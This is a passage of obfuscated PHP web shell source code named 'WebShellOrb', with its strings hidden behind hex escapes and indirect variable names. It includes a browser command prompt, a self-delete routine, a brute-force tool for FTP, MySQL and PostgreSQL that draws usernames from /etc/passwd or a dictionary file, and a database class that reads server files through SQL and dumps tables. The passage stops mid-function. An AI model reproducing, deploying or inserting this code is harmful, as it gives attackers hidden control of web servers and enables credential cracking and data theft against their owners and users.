echo "\x3c/t\x65xtare\x61\x3e<t\x61bl\x65\x20\x73\x74\x79\x6c\x65=\"\x62ord\x65\x72:1px s\x6fli\x64 \x23d\x66\x35\x3b\x62\x61c\x6b\x67r\x6fund-\x63o\x6cor:#555\x3bbo\x72der-\x74\x6f\x70:0p\x78\x3b\"\x20\x63e\x6c\x6cp\x61d\x64\x69\x6eg\x3d0 \x63\x65\x6clsp\x61\x63\x69\x6eg=0\x20\x77idt\x68\x3d\"100%\x22\x3e<t\x72\x3e\x3ctd\x20w\x69\x64th=\x221%\">\$</td>\x3ctd><i\x6e\x70ut\x20\x74y\x70e=\x74e\x78\x74\x20\x6e\x61m\x65\x3dcmd \x73t\x79\x6c\x65\x3d\x22b\x6frd\x65\x72:0\x70\x78\x3bwidth:\x3100\x25\x3b\" \x6fnk\x65y\x64ow\x6e=\"\x6b\x70(\x65\x76\x65nt)\x3b\"\x3e\x3c/t\x64></\x74\x72>\x3c/\x74a\x62\x6c\x65\x3e";
echo "\x3c/\x66\x6fr\x6d\x3e</\x64iv>\x3c\x73c\x72\x69\x70t\x3ed\x2e\x63f.c\x6dd.f\x6f\x63\x75s()\x3b</\x73\x63\x72ip\x74>";
WebShellOrbFooter();
}
function actionLogout()
{
setcookie(md5($_SERVER["H\x54TP\x5fH\x4fS\x54"]), "", time() - 3600);
die("bye!");
}
function actionSelfRemove()
{
if ($_POST["\x70\x31"] == "\x79e\x73") {
if (@unlink(preg_replace("\x21\x5c(\x5c\x64+\\)\\\x73.*!", "", __FILE__)))
die("\x53\x68el\x6c\x20\x72e\x6dov\x65d");
else
echo "\x75\x6el\x69\x6ek\x20\x65r\x72\x6fr!";
}
if ($_POST["p\x31"] != "y\x65\x73")
WebShellOrbHeader();
echo "<h\x31>\x53\x75ic\x69de</\x68\x31>\x3cd\x69\x76 c\x6c\x61s\x73=cont\x65nt>r\x65\x6d\x6fv\x65\x20th\x65 \x73\x68el\x6c?<\x62\x72\x3e<a\x20href=\x23\x20onc\x6c\x69\x63k\x3d\"\x67(\x6e\x75l\x6c,n\x75\x6c\x6c,\x27y\x65s')\x22\x3eYe\x73</\x61\x3e</\x64iv>";
WebShellOrbFooter();
}
function actionBruteforce()
{
WebShellOrbHeader();
if (isset($_POST["prot\x6f"])) {
echo "<h\x31>Res\x75l\x74\x73</h\x31>\x3c\x64\x69\x76 cl\x61\x73s\x3d\x63\x6f\x6ete\x6e\x74\x3e<\x73\x70a\x6e\x3e\x54\x79pe:\x3c/s\x70\x61n\x3e " . htmlspecialchars($_POST["p\x72o\x74\x6f"]) . " <s\x70\x61n>\x53\x65r\x76er:</\x73p\x61\x6e> " . htmlspecialchars($_POST["s\x65rver"]) . "<b\x72\x3e";
if ($_POST["p\x72\x6f\x74o"] == "\x66\x74\x70") {
function WebShellOrbBruteForce($ip, $port, $login, $pass)
{
${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x72\x72\x64\x6e\x63\x7a"] = "l\x6f\x67i\x6e";
$uznclobfyc = "\x70a\x73\x73";
${"G\x4cOBA\x4cS"}["\x68v\x6a\x66b\x64\x70e\x77h"] = "\x66\x70";
$dhzvzdjxb = "p\x6f\x72\x74";
${${"GLO\x42\x41L\x53"}["t\x62\x72\x68\x71\x62\x69"]} = @ftp_connect(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x71\x65l\x61\x73g\x6do\x71"]}, ${$dhzvzdjxb} ? ${${"GLO\x42A\x4cS"}["\x6e\x68\x65\x67y\x75\x6a\x6b\x62g"]} : 21);
if (!${${"\x47\x4c\x4f\x42\x41LS"}["\x68vj\x66\x62\x64\x70\x65wh"]})
return false;
$dhmeygjtci = "fp";
${${"GL\x4f\x42\x41L\x53"}["y\x6d\x68\x6e\x6e\x70"]} = @ftp_login(${${"GLOB\x41\x4cS"}["t\x62\x72h\x71b\x69"]}, ${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6f\x72r\x64n\x63z"]}, ${$uznclobfyc});
@ftp_close(${$dhmeygjtci});
return ${${"GL\x4f\x42\x41\x4c\x53"}["y\x6d\x68n\x6e\x70"]};
}
} elseif ($_POST["\x70\x72\x6ft\x6f"] == "mysql") {
function WebShellOrbBruteForce($ip, $port, $login, $pass)
{
$xzunqnw = "\x72\x65\x73";
${"G\x4cOBAL\x53"}["\x77r\x71\x71k\x76\x66\x69w"] = "p\x6f\x72\x74";
${"\x47\x4c\x4f\x42A\x4cS"}["\x6e\x7a\x78re\x6b\x7aw"] = "\x72\x65\x73";
${"\x47\x4cO\x42A\x4c\x53"}["\x6a\x68\x71\x71\x65\x6bp\x67d\x64c"] = "l\x6f\x67\x69\x6e";
${"GL\x4fB\x41LS"}["\x65\x73t\x77\x6f\x67h\x79mk\x71"] = "r\x65\x73";
${${"GL\x4f\x42\x41LS"}["\x6e\x7a\x78re\x6b\x7a\x77"]} = @mysql_connect(${${"G\x4cOB\x41\x4c\x53"}["\x71\x65l\x61\x73\x67\x6d\x6fq"]} . ":" . (${${"\x47\x4c\x4f\x42A\x4cS"}["\x6e\x68eg\x79\x75jk\x62g"]} ? ${${"\x47\x4c\x4f\x42\x41LS"}["\x77r\x71\x71\x6bvf\x69\x77"]} : 3306), ${${"G\x4cOB\x41\x4c\x53"}["j\x68q\x71\x65\x6b\x70\x67ddc"]}, ${${"\x47\x4c\x4fBAL\x53"}["\x69cd\x75\x69\x72\x76\x63"]});
@mysql_close(${$xzunqnw});
return ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x73\x74w\x6f\x67\x68\x79m\x6bq"]};
}
} elseif ($_POST["\x70\x72o\x74\x6f"] == "pg\x73\x71l") {
function WebShellOrbBruteForce($ip, $port, $login, $pass)
{
${"\x47LO\x42A\x4cS"}["\x71gt\x65\x76i\x67\x69\x6f\x6c\x76"] = "p\x61\x73\x73";
$kgcwsyxmq = "\x73\x74\x72";
$tjassyjer = "\x70\x6f\x72\x74";
$lgcepsiowx = "st\x72";
${$kgcwsyxmq} = "\x68ost\x3d\x27" . ${${"\x47L\x4f\x42\x41\x4c\x53"}["\x71\x65l\x61\x73\x67\x6d\x6f\x71"]} . "\x27 \x70\x6f\x72\x74='" . ${$tjassyjer} . "' \x75\x73\x65\x72=\x27" . ${${"\x47\x4cOB\x41\x4c\x53"}["\x62\x64r\x6c\x77j\x74\x74k"]} . "' p\x61s\x73w\x6f\x72d\x3d\x27" . ${${"\x47LO\x42\x41\x4cS"}["\x71\x67\x74\x65\x76\x69\x67\x69\x6flv"]} . "' \x64\x62\x6ea\x6de\x3d\x70o\x73\x74\x67\x72\x65s";
${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x79\x6d\x68n\x6e\x70"]} = @pg_connect(${$lgcepsiowx});
${"\x47\x4c\x4f\x42\x41\x4cS"}["xt\x77\x6d\x76\x71i\x6c"] = "\x72\x65\x73";
@pg_close(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x79m\x68\x6e\x6e\x70"]});
return ${${"\x47\x4c\x4f\x42AL\x53"}["\x78twmvq\x69\x6c"]};
}
}
${"\x47\x4c\x4fBALS"}["\x6dt\x6ebnva\x68k"] = "a\x74\x74\x65\x6dp\x74\x73";
$sdtrshb = "\x73\x65r\x76\x65\x72";
${${"\x47\x4cO\x42\x41L\x53"}["\x6e\x73\x63\x71\x61\x71n"]} = 0;
${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6d\x74\x6e\x62\x6e\x76\x61h\x6b"]} = 0;
${$sdtrshb} = explode(":", $_POST["\x73er\x76e\x72"]);
if ($_POST["typ\x65"] == 1) {
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6de\x72\x63\x67\x6d\x64\x77e"]} = @file("/\x65\x74c/pa\x73s\x77\x64");
if (is_array(${${"\x47LO\x42\x41\x4c\x53"}["m\x65\x72\x63\x67\x6d\x64\x77\x65"]})) {
${"\x47LO\x42\x41\x4cS"}["\x73\x6e\x65\x6e\x61jn"] = "\x6cin\x65";
foreach (${${"\x47\x4cO\x42A\x4c\x53"}["\x6de\x72cg\x6d\x64\x77\x65"]} as ${${"\x47\x4cO\x42A\x4c\x53"}["\x73\x6e\x65\x6ea\x6a\x6e"]}) {
${"GL\x4fB\x41LS"}["\x62g\x78\x71f\x66\x76est"] = "\x73e\x72\x76\x65r";
${"GLO\x42\x41LS"}["\x76\x72\x77\x76\x68l\x65\x6d\x6d"] = "\x6c\x69\x6ee";
$lkfguubws = "l\x69n\x65";
${"\x47L\x4f\x42A\x4c\x53"}["\x63\x65\x69x\x7a\x65\x67qt"] = "\x6cin\x65";
${${"\x47L\x4f\x42A\x4c\x53"}["c\x65i\x78\x7a\x65g\x71\x74"]} = explode(":", ${$lkfguubws});
$odemeqxd = "\x6ci\x6e\x65";
++${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x63i\x76\x6b\x67\x6bk\x63"]};
if (WebShellOrbBruteForce(@${${"\x47L\x4f\x42\x41\x4cS"}["\x6en\x77\x74\x63\x6evv"]}[0], @${${"\x47\x4c\x4fB\x41\x4cS"}["\x62g\x78qff\x76e\x73\x74"]}[1], ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76rwvh\x6c\x65\x6d\x6d"]}[0], ${$odemeqxd}[0])) {
${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6e\x73cq\x61qn"]}++;
echo "\x3c\x62\x3e" . htmlspecialchars(${${"G\x4cO\x42AL\x53"}["\x6fm\x61\x6e\x78\x66r\x6f\x70\x6c"]}[0]) . "\x3c/\x62\x3e:" . htmlspecialchars(${${"\x47L\x4fB\x41\x4c\x53"}["\x6f\x6da\x6ex\x66r\x6fpl"]}[0]) . "\x3c\x62r>";
}
if (@$_POST["re\x76\x65\x72se"]) {
$cfxddtbkve = "at\x74\x65m\x70\x74s";
$gfxuhsrtkeve = "\x6ci\x6e\x65";
${"\x47\x4cOBA\x4cS"}["\x74\x64\x6bp\x74ho\x63i\x66\x61\x72"] = "\x74\x6d\x70";
$vrbvgxqwmgy = "i";
${${"\x47\x4c\x4f\x42\x41L\x53"}["\x65\x63\x62\x63m\x69\x79\x62u\x65"]} = "";
${"\x47\x4c\x4fB\x41LS"}["\x69\x71\x6b\x74z\x66\x6el"] = "\x69";
$cludwpcuhof = "\x69";
$qsuknriguig = "\x74\x6d\x70";
for (${$cludwpcuhof} = strlen(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6f\x6d\x61\x6e\x78f\x72op\x6c"]}[0]) - 1; ${${"G\x4c\x4f\x42A\x4c\x53"}["i\x71k\x74\x7af\x6e\x6c"]} >= 0; --${${"G\x4cO\x42A\x4cS"}["\x63l\x6b\x75\x79o\x6aj"]})
${${"\x47\x4c\x4f\x42\x41\x4cS"}["t\x64\x6bp\x74\x68\x6f\x63\x69\x66a\x72"]} .= ${$gfxuhsrtkeve}[0][${$vrbvgxqwmgy}];
++${$cfxddtbkve};
if (WebShellOrbBruteForce(@${${"G\x4c\x4f\x42\x41\x4cS"}["\x6e\x6e\x77\x74c\x6ev\x76"]}[0], @${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6e\x6e\x77\x74\x63\x6e\x76v"]}[1], ${${"\x47\x4c\x4fBA\x4c\x53"}["om\x61\x6exf\x72\x6f\x70\x6c"]}[0], ${$qsuknriguig})) {
${"\x47\x4c\x4fB\x41L\x53"}["\x75\x68i\x72x\x66x\x70"] = "\x73\x75\x63c\x65\x73s";
$fhhrngya = "t\x6d\x70";
${${"\x47\x4c\x4f\x42\x41L\x53"}["\x75h\x69rx\x66\x78\x70"]}++;
echo "\x3cb\x3e" . htmlspecialchars(${${"\x47\x4c\x4f\x42\x41L\x53"}["om\x61\x6ex\x66\x72\x6f\x70\x6c"]}[0]) . "\x3c/b\x3e:" . htmlspecialchars(${$fhhrngya});
}
}
}
}
} elseif ($_POST["\x74\x79\x70e"] == 2) {
${"\x47\x4cO\x42A\x4c\x53"}["\x73e\x75k\x6f\x70\x6a"] = "\x74\x65mp";
${${"\x47\x4c\x4f\x42\x41LS"}["\x73\x65\x75\x6b\x6f\x70\x6a"]} = @file($_POST["d\x69c\x74"]);
if (is_array(${${"\x47\x4cOB\x41\x4c\x53"}["me\x72cg\x6d\x64w\x65"]})) {
$cpxpxkucuiy = "\x74e\x6d\x70";
foreach (${$cpxpxkucuiy} as ${${"GLOB\x41\x4cS"}["\x6f\x6dan\x78\x66\x72\x6f\x70\x6c"]}) {
$jidncks = "\x73\x65\x72ver";
${"\x47L\x4fB\x41L\x53"}["\x74\x6dy\x76\x67bh"] = "att\x65m\x70\x74\x73";
${"G\x4cO\x42\x41\x4c\x53"}["\x6c\x6c\x73u\x6b\x67"] = "\x73\x65\x72v\x65\x72";
${"\x47\x4cOB\x41LS"}["\x69\x63d\x75fnw\x64"] = "\x6c\x69\x6ee";
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69c\x64\x75f\x6e\x77\x64"]} = trim(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6fm\x61n\x78f\x72o\x70\x6c"]});
++${${"G\x4c\x4f\x42AL\x53"}["\x74\x6d\x79\x76gb\x68"]};
if (WebShellOrbBruteForce(${${"\x47\x4cO\x42AL\x53"}["\x6cls\x75\x6b\x67"]}[0], @${$jidncks}[1], $_POST["\x6cogi\x6e"], ${${"\x47\x4c\x4fB\x41L\x53"}["o\x6d\x61\x6e\x78fr\x6f\x70\x6c"]})) {
${"\x47\x4c\x4f\x42\x41LS"}["jo\x71\x6bw\x6f\x77lna\x74"] = "su\x63c\x65\x73s";
$kubptgfdsmd = "lin\x65";
${${"\x47\x4c\x4fBA\x4c\x53"}["\x6ao\x71\x6b\x77\x6f\x77lna\x74"]}++;
echo "\x3c\x62>" . htmlspecialchars($_POST["l\x6f\x67\x69\x6e"]) . "</\x62>:" . htmlspecialchars(${$kubptgfdsmd}) . "<\x62r>";
}
}
}
}
echo "\x3c\x73p\x61n>A\x74\x74\x65\x6dpt\x73:\x3c/s\x70a\x6e\x3e $attempts <spa\x6e\x3eS\x75c\x63\x65\x73s:</\x73\x70\x61\x6e\x3e\x20$success\x3c/\x64i\x76\x3e\x3cb\x72\x3e";
}
echo "\x3c\x681>B\x72u\x74\x65\x66or\x63e\x3c/h\x31\x3e\x3cd\x69\x76 c\x6c\x61s\x73\x3d\x63on\x74e\x6et><\x74\x61ble>\x3cf\x6frm\x20\x6d\x65\x74hod=\x70\x6f\x73\x74>\x3ct\x72\x3e\x3c\x74d\x3e<s\x70an>T\x79\x70\x65\x3c/s\x70\x61n></\x74\x64>" . "\x3c\x74\x64><s\x65\x6cect\x20name=pr\x6ft\x6f\x3e<\x6f\x70\x74i\x6f\x6e \x76a\x6cue=f\x74p\x3e\x46\x54\x50</opt\x69on\x3e<\x6fpt\x69o\x6e\x20\x76al\x75\x65\x3dm\x79\x73\x71\x6c>\x4d\x79S\x71l</o\x70\x74\x69\x6f\x6e\x3e\x3c\x6f\x70tio\x6e\x20valu\x65=pg\x73\x71\x6c\x3eP\x6f\x73t\x67\x72\x65\x53\x71\x6c</\x6fp\x74\x69\x6f\x6e></s\x65\x6ce\x63\x74>\x3c/t\x64\x3e</tr>\x3c\x74\x72\x3e<\x74\x64>" . "<\x69\x6eput\x20\x74ype=h\x69\x64\x64\x65n \x6e\x61\x6de\x3d\x63\x20va\x6c\x75\x65=\"" . htmlspecialchars($GLOBALS["cw\x64"]) . "\x22>" . "\x3ci\x6e\x70u\x74\x20\x74\x79p\x65=hidde\x6e\x20\x6ea\x6de=a\x20v\x61l\x75e\x3d\"" . htmlspecialchars($_POST["a"]) . "\x22\x3e" . "\x3cinp\x75\x74\x20\x74\x79p\x65\x3dh\x69\x64d\x65n\x20na\x6de\x3dc\x68a\x72\x73\x65\x74 \x76\x61\x6c\x75e\x3d\x22" . htmlspecialchars($_POST["\x63h\x61\x72\x73et"]) . "\x22\x3e" . "<s\x70an>\x53erver:\x70ort\x3c/\x73\x70\x61\x6e>\x3c/\x74d\x3e" . "<\x74\x64\x3e<\x69nput \x74yp\x65=\x74\x65x\x74\x20\x6ea\x6d\x65=\x73er\x76e\x72\x20\x76a\x6c\x75\x65\x3d\"\x3127.0.\x30\x2e1\x22\x3e\x3c/\x74\x64></t\x72>" . "<\x74r\x3e<\x74d><s\x70\x61n>Brute \x74ype</\x73p\x61n\x3e</\x74\x64>" . "<td\x3e\x3c\x6c\x61be\x6c>\x3ci\x6eput typ\x65=r\x61di\x6f nam\x65=\x74\x79pe \x76\x61l\x75\x65\x3d\x221\"\x20\x63h\x65cke\x64\x3e /e\x74\x63/\x70\x61sswd\x3c/\x6cab\x65\x6c\x3e</t\x64\x3e\x3c/t\x72\x3e" . "\x3c\x74r>\x3c\x74d\x3e\x3c/t\x64\x3e\x3c\x74\x64>\x3cl\x61\x62e\x6c\x20\x73t\x79\x6ce\x3d\x22p\x61\x64\x64\x69n\x67-\x6ceft:15\x70x\"\x3e<\x69\x6epu\x74 type=\x63\x68eck\x62\x6fx \x6eame=re\x76\x65\x72s\x65 v\x61l\x75\x65=\x31\x20\x63h\x65\x63k\x65d> r\x65v\x65rse (log\x69n\x20-\x3e\x20ni\x67ol)\x3c/lab\x65\x6c></\x74\x64\x3e\x3c/t\x72>" . "\x3ct\x72><td>\x3c/td><\x74\x64><label><inpu\x74\x20t\x79\x70e=ra\x64\x69\x6f \x6ea\x6d\x65=t\x79\x70e\x20v\x61l\x75\x65=\"2\x22>\x20\x44ict\x69\x6f\x6e\x61\x72y\x3c/l\x61be\x6c></t\x64\x3e\x3c/\x74r>" . "<\x74r>\x3ctd></\x74\x64>\x3ct\x64><\x74\x61\x62l\x65\x20\x73\x74yl\x65=\x22\x70ad\x64i\x6eg-l\x65\x66\x74:15p\x78\">\x3ctr><t\x64\x3e<\x73p\x61n\x3e\x4co\x67in\x3c/s\x70\x61\x6e></td\x3e" . "\x3ct\x64>\x3c\x69\x6e\x70\x75\x74\x20ty\x70\x65=t\x65\x78t n\x61me\x3d\x6c\x6f\x67\x69n\x20v\x61l\x75e\x3d\x22\x72o\x6ft\"\x3e\x3c/td>\x3c/t\x72>" . "\x3ct\x72>\x3c\x74d\x3e<s\x70\x61\x6e>\x44\x69c\x74\x69\x6f\x6e\x61ry\x3c/\x73p\x61n\x3e</\x74\x64\x3e" . "\x3c\x74d\x3e<i\x6ep\x75t type\x3dte\x78\x74\x20\x6ea\x6d\x65\x3d\x64i\x63t\x20\x76\x61\x6c\x75\x65=\"" . htmlspecialchars($GLOBALS["cwd"]) . "\x70ass\x77d.\x64\x69c\"></t\x64></\x74r\x3e\x3c/\x74\x61bl\x65>" . "</td\x3e</tr>\x3c\x74\x72\x3e<\x74d\x3e\x3c/\x74d\x3e\x3ctd><\x69np\x75t\x20type\x3d\x73u\x62\x6di\x74\x20va\x6cue=\x22>>\"\x3e</\x74d\x3e\x3c/\x74r>\x3c/\x66\x6f\x72\x6d></table\x3e";
echo "</d\x69v><b\x72>";
WebShellOrbFooter();
}
function actionSql()
{
class DbClass
{
var $type;
var $link;
var $res;
function DbClass7($type)
{
$this->type = ${${"\x47\x4c\x4f\x42A\x4c\x53"}["vxh\x64\x6f\x69\x68\x71lk\x64"]};
}
function connect($host, $user, $pass, $dbname)
{
${"\x47L\x4f\x42ALS"}["\x6eo\x6b\x78yn\x6d\x6dh"] = "use\x72";
switch ($this->type) {
case "m\x79sql":
if ($this->link = @mysql_connect($host, ${${"\x47\x4cOBA\x4cS"}["n\x6fk\x78\x79\x6em\x6dh"]}, ${${"\x47L\x4f\x42\x41L\x53"}["ic\x64\x75i\x72\x76\x63"]}, true))
return true;
break;
case "\x70gsql":
$host = explode(":", $host);
if (!$host[1])
$host[1] = 5432;
if ($this->link = @pg_connect("h\x6f\x73\x74={$host[0]} \x70\x6f\x72t={$host[1]} u\x73er\x3d$user\x20\x70\x61ss\x77o\x72\x64\x3d$pass\x20\x64\x62\x6e\x61\x6de=$dbname"))
return true;
break;
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case "m\x79s\x71\x6c":
if (@mysql_select_db(${${"G\x4c\x4f\x42\x41L\x53"}["\x62\x6fp\x6d\x77\x65\x6a\x67\x69\x72\x66"]}))
return true;
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case "my\x73\x71l":
return $this->res = @mysql_query(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6c\x68\x79\x64m\x6d\x79w\x77\x6e"]});
break;
case "\x70\x67\x73q\x6c":
return $this->res = @pg_query($this->link, ${${"\x47\x4cO\x42AL\x53"}["\x6c\x68\x79d\x6d\x6d\x79ww\x6e"]});
break;
}
return false;
}
function fetch()
{
$cqtiiytoxs = "\x72es";
$lmqgccr = "\x72\x65\x73";
${${"\x47LOB\x41L\x53"}["\x79\x6d\x68\x6e\x6e\x70"]} = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case "mysql":
return @mysql_fetch_assoc(${$cqtiiytoxs});
break;
case "pg\x73\x71\x6c":
return @pg_fetch_assoc(${$lmqgccr});
break;
}
return false;
}
function listDbs()
{
switch ($this->type) {
case "\x6d\x79\x73\x71\x6c":
return $this->query("SHO\x57 \x64a\x74\x61\x62\x61s\x65s");
break;
case "\x70\x67sql":
return $this->res = $this->query("S\x45LE\x43T \x64a\x74n\x61\x6de \x46R\x4f\x4d p\x67\x5fdat\x61\x62ase \x57\x48\x45\x52\x45\x20da\x74is\x74\x65mp\x6cat\x65\x21='t'");
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case "mys\x71l":
return $this->res = $this->query("SHO\x57 T\x41BLES");
break;
case "p\x67s\x71\x6c":
return $this->res = $this->query("\x73\x65\x6cec\x74 \x74a\x62\x6c\x65_\x6e\x61\x6d\x65 fr\x6fm i\x6e\x66\x6frmat\x69\x6fn_\x73\x63h\x65ma.\x74abl\x65s\x20\x77\x68e\x72e\x20t\x61\x62\x6c\x65\x5fsch\x65ma !\x3d \x27inf\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x5fsche\x6da\x27 \x41ND t\x61\x62\x6ce_\x73\x63\x68e\x6da\x20\x21\x3d \x27p\x67_c\x61\x74\x61\x6c\x6f\x67\x27");
break;
}
return false;
}
function error()
{
switch ($this->type) {
case "my\x73ql":
return @mysql_error();
break;
case "p\x67\x73q\x6c":
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
${"\x47\x4c\x4fBALS"}["e\x71\x6fb\x79\x73g\x6d\x61of"] = "s\x74\x72";
switch ($this->type) {
case "\x6d\x79sq\x6c":
if (function_exists("\x6d\x79\x73\x71l\x5f\x73et_c\x68a\x72\x73e\x74"))
return @mysql_set_charset(${${"G\x4cOB\x41\x4c\x53"}["\x6c\x68\x79d\x6d\x6d\x79\x77w\x6e"]}, $this->link);
else
$this->query("S\x45T\x20CH\x41RS\x45\x54 " . ${${"\x47\x4c\x4f\x42\x41L\x53"}["l\x68y\x64\x6d\x6dy\x77w\x6e"]});
break;
case "p\x67sql":
return @pg_set_client_encoding($this->link, ${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x65\x71\x6f\x62\x79s\x67\x6d\x61\x6f\x66"]});
break;
}
return false;
}
function loadFile($str)
{
${"G\x4cOB\x41\x4cS"}["\x69\x66t\x66\x68y\x6brv"] = "r";
$kvjjxcllg = "\x73t\x72";
$zuwohcpx = "r";
switch ($this->type) {
case "m\x79\x73ql":
return $this->fetch($this->query("\x53\x45\x4cECT\x20\x4cOA\x44_\x46\x49LE(\x27" . addslashes(${${"\x47L\x4f\x42A\x4cS"}["lhy\x64\x6d\x6dy\x77\x77n"]}) . "\x27) \x61\x73\x20\x66ile"));
break;
case "p\x67s\x71l":
$this->query("\x43\x52E\x41TE T\x41\x42L\x45\x20W\x65\x62\x53\x68e\x6c\x6c\x4f\x72b\x32(\x66\x69\x6c\x65\x20te\x78\x74);\x43OP\x59 \x57\x65\x62S\x68e\x6cl\x4frb2\x20FROM\x20'" . addslashes(${$kvjjxcllg}) . "\x27;se\x6cect file fr\x6fm\x20\x57\x65bS\x68\x65\x6c\x6cO\x72b2;");
${$zuwohcpx} = array();
while (${${"\x47\x4cO\x42\x41\x4c\x53"}["cl\x6b\x75\x79\x6fj\x6a"]} = $this->fetch())
${${"\x47\x4c\x4f\x42\x41LS"}["\x6dw\x70\x6f\x79\x74\x6d\x77u\x73"]}[] = ${${"\x47\x4c\x4f\x42ALS"}["cl\x6b\x75yo\x6aj"]}["file"];
$this->query("\x64ro\x70 \x74abl\x65 W\x65\x62S\x68\x65\x6c\x6c\x4fr\x622");
return array(
"\x66ile" => implode("\n", ${${"\x47\x4cO\x42A\x4cS"}["\x69ft\x66h\x79\x6brv"]})
);
break;
}
return false;
}
function dump($table, $fp = false)
{
$lvspedl = "\x74\x61\x62\x6c\x65";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["hclxg\x63\x6b\x76"] = "\x63\x72\x65\x61\x74\x65";
${"\x47\x4cO\x42\x41\x4c\x53"}["\x62\x65\x76\x76\x79d\x6b"] = "\x72\x65\x73";
$fxcpioaubjb = "t\x61\x62\x6c\x65";
${"\x47LO\x42\x41L\x53"}["v\x7al\x70\x68ucc\x70"] = "\x69";
${"\x47L\x4f\x42\x41\x4cS"}["\x6c\x6c\x72\x73l\x63"] = "\x73q\x6c";
${"\x47\x4c\x4f\x42A\x4cS"}["q\x76b\x6b\x62\x70\x69d\x78c"] = "i\x74em";
$gdtnlefrsw = "\x69\x74e\x6d";
switch ($this->type) {
case "\x6d\x79s\x71l":
${${"\x47\x4c\x4f\x42A\x4c\x53"}["y\x6dhn\x6e\x70"]} = $this->query("S\x48OW\x20\x43R\x45\x41\x54E \x54\x41BLE\x20`" . ${$lvspedl} . "\x60");
${${"G\x4c\x4f\x42A\x4c\x53"}["\x6cf\x6c\x6a\x72\x64m\x63"]} = mysql_fetch_array(${${"\x47\x4c\x4f\x42AL\x53"}["\x62\x65v\x76\x79d\x6b"]});
${${"G\x4c\x4fB\x41L\x53"}["\x6c\x77\x71\x72\x69\x6f"]} = ${${"\x47LO\x42\x41LS"}["\x68\x63\x6cxg\x63\x6bv"]}[1] . "\x3b\n";
if (${${"\x47\x4c\x4fB\x41LS"}["\x74b\x72\x68\x71\x62i"]})
fwrite(${${"G\x4c\x4fBAL\x53"}["\x74\x62\x72\x68\x71b\x69"]}, ${${"G\x4cOB\x41\x4c\x53"}["lwqr\x69\x6f"]});
else
echo (${${"G\x4c\x4f\x42\x41\x4cS"}["l\x6c\x72\x73lc"]});
$this->query("\x53ELECT * F\x52O\x4d\x20\x60" . ${$fxcpioaubjb} . "`");
${${"\x47\x4c\x4f\x42ALS"}["v\x7a\x6c\x70huc\x63\x70"]} = 0;
${${"\x47LO\x42A\x4c\x53"}["s\x64i\x67\x74\x64\x67i\x68"]} = true;
while (${$gdtnlefrsw} = $this->fetch()) {
${${"\x47\x4c\x4f\x42AL\x53"}["\x6c\x77\x71\x72\x69\x6f"]} = "";
${"\x47\x4c\x4f\x42AL\x53"}["\x78\x62eng\x73"] = "\x63\x6f\x6c\x75m\x6e\x73";
$xobgpipr = "\x73\x71\x6c";
if (${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x63\x6c\x6b\x75\x79\x6fj\x6a"]} % 1000 == 0) {
${"\x47LO\x42\x41\x4cS"}["\x78\x68b\x77yi\x6f\x6c\x69"] = "\x68\x65\x61\x64";
$ogmpcygtnlp = "\x73ql";
${${"\x47\x4cO\x42AL\x53"}["xh\x62\x77\x79i\x6fl\x69"]} = true;
${$ogmpcygtnlp} = ";\n\n";
}
$cokvjkyzuyu = "\x76";
$nxxfdqradvx = "\x6b";
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["x\x62\x65\x6eg\x73"]} = array();
foreach (${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x62\x64m\x71w\x71\x76\x66\x71\x6e"]} as ${$nxxfdqradvx} => ${$cokvjkyzuyu}) {
$adukszrwybrf = "\x69t\x65m";
$tlgrwbkwwn = "\x6b";
${"\x47\x4c\x4fB\x41LS"}["\x73\x6d\x64p\x66\x6a\x64\x70\x65"] = "\x69\x74\x65m";
${"\x47\x4c\x4f\x42ALS"}["\x79\x6d\x79\x70\x70\x74\x6d\x76d\x70\x65\x61"] = "i\x74\x65\x6d";
${"G\x4c\x4f\x42\x41\x4cS"}["p\x67\x62\x69\x71\x79\x7a\x64g\x6a\x63"] = "\x76";
${"\x47LO\x42\x41\x4c\x53"}["\x62\x66n\x6f\x71\x6d\x73\x76\x66\x64"] = "k";
if (${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x70g\x62\x69\x71\x79zdg\x6a\x63"]} === null)
${${"GLO\x42A\x4cS"}["\x79\x6d\x79p\x70\x74m\x76\x64\x70\x65\x61"]}[${$tlgrwbkwwn}] = "NUL\x4c";
elseif (is_int(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x76\x76dx\x6d\x6a\x62\x67\x65c"]}))
${${"\x47\x4c\x4fBA\x4cS"}["\x73\x6d\x64\x70\x66\x6a\x64pe"]}[${${"\x47\x4c\x4f\x42AL\x53"}["\x62\x66\x6e\x6f\x71\x6d\x73vf\x64"]}] = ${${"GLO\x42\x41L\x53"}["v\x76\x64xm\x6a\x62\x67\x65\x63"]};
else
${$adukszrwybrf}[${${"\x47\x4c\x4f\x42A\x4cS"}["\x6fq\x76r\x79xe"]}] = "\x27" . @mysql_real_escape_string(${${"G\x4cO\x42\x41\x4c\x53"}["v\x76\x64x\x6d\x6abg\x65c"]}) . "'";
${${"G\x4c\x4fBA\x4c\x53"}["a\x6d\x65\x68\x74\x67"]}[] = "\x60" . ${${"\x47L\x4f\x42A\x4c\x53"}["\x6f\x71v\x72y\x78\x65"]} . "`";
}
